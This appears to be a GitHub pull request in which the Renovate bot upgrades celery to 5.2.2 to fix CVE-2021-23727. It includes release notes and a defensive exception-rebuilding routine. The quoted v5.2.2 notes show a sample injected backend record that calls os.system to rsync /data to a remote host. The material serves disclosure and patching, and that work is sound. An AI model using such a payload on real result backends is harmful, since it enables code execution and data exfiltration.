
Update dependency celery to v5 [SECURITY] - abandoned #286

Open
wants to merge 1 commit into
base: master

Conversation

renovate[bot]
Contributor

@renovate renovate bot commented Mar 7, 2022

Mend Renovate

This PR contains the following updates:

Package: celery (source, changelog)
Change: ==4.4.5 -> ==5.2.2

GitHub Vulnerability Alerts

CVE-2021-23727

This affects the package celery before 5.2.2. It by default trusts the messages and metadata stored in backends (result stores). When reading task metadata from the backend, the data is deserialized. Given that an attacker can gain access to, or somehow manipulate the metadata within a celery backend, they could trigger a stored command injection vulnerability and potentially gain further access to the system.


Release Notes

celery/celery

v5.2.2

Compare Source


:release-date: 2021-12-26 16:30 P.M UTC+2:00
:release-by: Omer Katz

  • Various documentation fixes.

  • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

    When a task fails, the failure information is serialized in the backend.
    In some cases, the exception class is only importable from the
    consumer's code base. In this case, we reconstruct the exception class
    so that we can re-raise the error on the process which queried the
    task's result. This was introduced in #4836.
    If the recreated exception type isn't an exception, this is a security issue.
    Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
    os.system("rsync /data [email protected]:~/data")
    by setting the task's result to a failure in the result backend, with the os module as the exception module,
    the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments, like so:

    .. code-block:: python

      {
          "exc_module": "os",
          "exc_type": "system",
          "exc_message": "rsync /data [email protected]:~/data"
      }

    According to my analysis, this vulnerability can only be exploited if
    the producer delayed a task which runs long enough for the
    attacker to change the result mid-flight, and the producer has
    polled for the task's result.
    The attacker would also have to gain access to the result backend.
    The severity of this security vulnerability is low, but we still
    recommend upgrading.


v5.2.1

Compare Source


:release-date: 2021-11-16 8.55 P.M UTC+6:00
:release-by: Asif Saif Uddin

  • Fix rstrip usage on bytes instance in ProxyLogger.
  • Pass logfile to ExecStop in celery.service example systemd file.
  • fix: reduce latency of AsyncResult.get under gevent (#7052)
  • Limit redis version: <4.0.0.
  • Bump min kombu version to 5.2.2.
  • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
  • Remove dependency to case (#7077).
  • fix: task expiration is timezone aware if needed (#7065).
  • Initial testing of pypy-3.8 beta to CI.
  • Docs, CI & tests cleanups.


v5.2.0

Compare Source


:release-date: 2021-11-08 7.15 A.M UTC+6:00
:release-by: Asif Saif Uddin

  • Prevent from subscribing to empty channels (#7040)
  • fix register_task method.
  • Fire task failure signal on final reject (#6980)
  • Limit pymongo version: <3.12.1 (#7041)
  • Bump min kombu version to 5.2.1


v5.1.2

Compare Source

Release date: 2021-06-28 16.15 P.M UTC+3:00

Release by: Omer Katz

  • When chords fail, correctly call errbacks. (#6814)

    We had a special case for calling errbacks when a chord failed
    which assumed they were old style. This change ensures that we
    call the proper errback dispatch method which understands new and
    old style errbacks, and adds test to confirm that things behave as
    one might expect now.

  • Avoid using the Event.isSet() deprecated alias. (#6824)

  • Reintroduce sys.argv default behaviour for Celery.start(). (#6825)

v5.1.1

Compare Source

Release date: 2021-06-17 16.10 P.M UTC+3:00

Release by: Omer Katz

  • Fix --pool=threads support in command line options parsing.
    (#6787)

  • Fix LoggingProxy.write() return type. (#6791)

  • Couchdb key is now always coerced into a string. (#6781)

  • grp is no longer imported unconditionally. (#6804)

    This fixes a regression in 5.1.0 when running Celery in non-unix
    systems.

  • Ensure regen utility class gets marked as done when concretised.
    (#6789)

  • Preserve call/errbacks of replaced tasks. (#6770)

  • Use single-lookahead for regen consumption. (#6799)

  • Revoked tasks are no longer incorrectly marked as retried. (#6812,
    #6816)

v5.1.0

Compare Source

Release date: 2021-05-23 19.20 P.M UTC+3:00

Release by: Omer Katz

  • celery -A app events -c camera now works as expected. (#6774)
  • Bump minimum required Kombu version to 5.1.0.

v5.0.6

Compare Source

v5.0.5

Compare Source

v5.0.4

Compare Source

v5.0.3

Compare Source

v5.0.2

Compare Source

v5.0.1

Compare Source

v5.0.0

Compare Source

v4.4.7

Compare Source


:release-date: 2020-07-31 11.45 P.M UTC+6:00
:release-by: Asif Saif Uddin

  • Add task_received, task_rejected and task_unknown to signals module.
  • [ES backend] add 401 as safe for retry.
  • treat internal errors as failure.
  • Remove redis fanout caveats.
  • FIX: -A and --args should behave the same. (#6223)
  • Class-based tasks autoretry (#6233)
  • Preserve order of group results with Redis result backend (#6218)
  • Replace future with celery.five Fixes #6250, and reraise to include
  • Fix REMAP_SIGTERM=SIGQUIT not working
  • (Fixes #6258) MongoDB: fix for serialization issue (#6259)
  • Make use of ordered sets in Redis opt-in
  • Test, CI, Docker, style and minor doc improvements.

v4.4.6

Compare Source


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate. View repository job log here.
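As an added illustration (not celery's own code and not part of this PR), a minimal reconstruction routine that applies the check the v5.2.2 release note describes: the class named by backend metadata is only instantiated when it is a class deriving from BaseException, so a record naming a plain callable such as os.system is refused instead of called. The metadata dicts are constructed samples and myapp.errors.QuotaExceeded is a hypothetical consumer-only exception type.

```python
import importlib

# Constructed sample metadata in the exc_module / exc_type / exc_message
# shape described in the release note; none of it comes from a real backend.
LEGIT_META = {"exc_module": "builtins", "exc_type": "KeyError",
              "exc_message": "user_id"}
# Hypothetical exception type that exists only in the consumer's code base.
UNIMPORTABLE_META = {"exc_module": "myapp.errors", "exc_type": "QuotaExceeded",
                     "exc_message": "limit reached"}
# Same shape as the tampered record quoted in the release note: a callable
# that is not an exception class, with a command string as its "message".
TAMPERED_META = {"exc_module": "os", "exc_type": "system",
                 "exc_message": "<attacker-controlled command>"}


class UnsafeExceptionType(Exception):
    """Backend metadata named something that is not an exception class."""


def resolve_exception_class(module_name, type_name):
    """Look up the object the metadata names, or None if it cannot be found."""
    try:
        module = importlib.import_module(module_name)
    except ImportError:
        return None
    return getattr(module, type_name, None)


def rebuild_exception(meta):
    """Recreate a stored failure without trusting the backend record.

    The check that matters is the issubclass() test: whatever the metadata
    names must be a class deriving from BaseException before it is called.
    import_module() still executes the named module's import code, so a
    backend that is not trusted also needs a module allowlist in front of it.
    """
    module_name, type_name = meta["exc_module"], meta["exc_type"]
    message = meta.get("exc_message", "")
    cls = resolve_exception_class(module_name, type_name)
    if cls is None:
        # Consumer-only type: build a stand-in class so the caller can still
        # re-raise something carrying the original name.
        cls = type(type_name, (Exception,), {"__module__": module_name})
    if not (isinstance(cls, type) and issubclass(cls, BaseException)):
        raise UnsafeExceptionType(
            f"{module_name}.{type_name} is not an exception class; refusing to call it")
    args = tuple(message) if isinstance(message, (list, tuple)) else (message,)
    return cls(*args)


def is_rejected(meta):
    """True when rebuild_exception refuses the record."""
    try:
        rebuild_exception(meta)
    except UnsafeExceptionType:
        return True
    return False
```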

@renovate renovate bot requested a review from Clivern as a code owner March 7, 2022 13:07
@sonarqubecloud

sonarqubecloud bot commented Mar 7, 2022

Kudos, SonarCloud Quality Gate passed!

  • Bug: A (0 Bugs)
  • Vulnerability: A (0 Vulnerabilities)
  • Security Hotspot: A (0 Security Hotspots)
  • Code Smell: A (0 Code Smells)

No Coverage information
No Duplication information

@renovate
Contributor Author

renovate bot commented Mar 24, 2023

Edited/Blocked Notification

Renovate will not automatically rebase this PR, because it does not recognize the last commit author and assumes somebody else may have edited the PR.

You can manually request rebase by checking the rebase/retry box above.

⚠️ Warning: custom changes will be lost.

@renovate renovate bot changed the title Update dependency celery to v5 [SECURITY] Update dependency celery to v5 [SECURITY] - abandoned Feb 24, 2024
Contributor Author

renovate bot commented Feb 24, 2024

Autoclosing Skipped

This PR has been flagged for autoclosing. However, it is being skipped due to the branch being already modified. Please close/delete it manually or report a bug if you think this is in error.

1 participant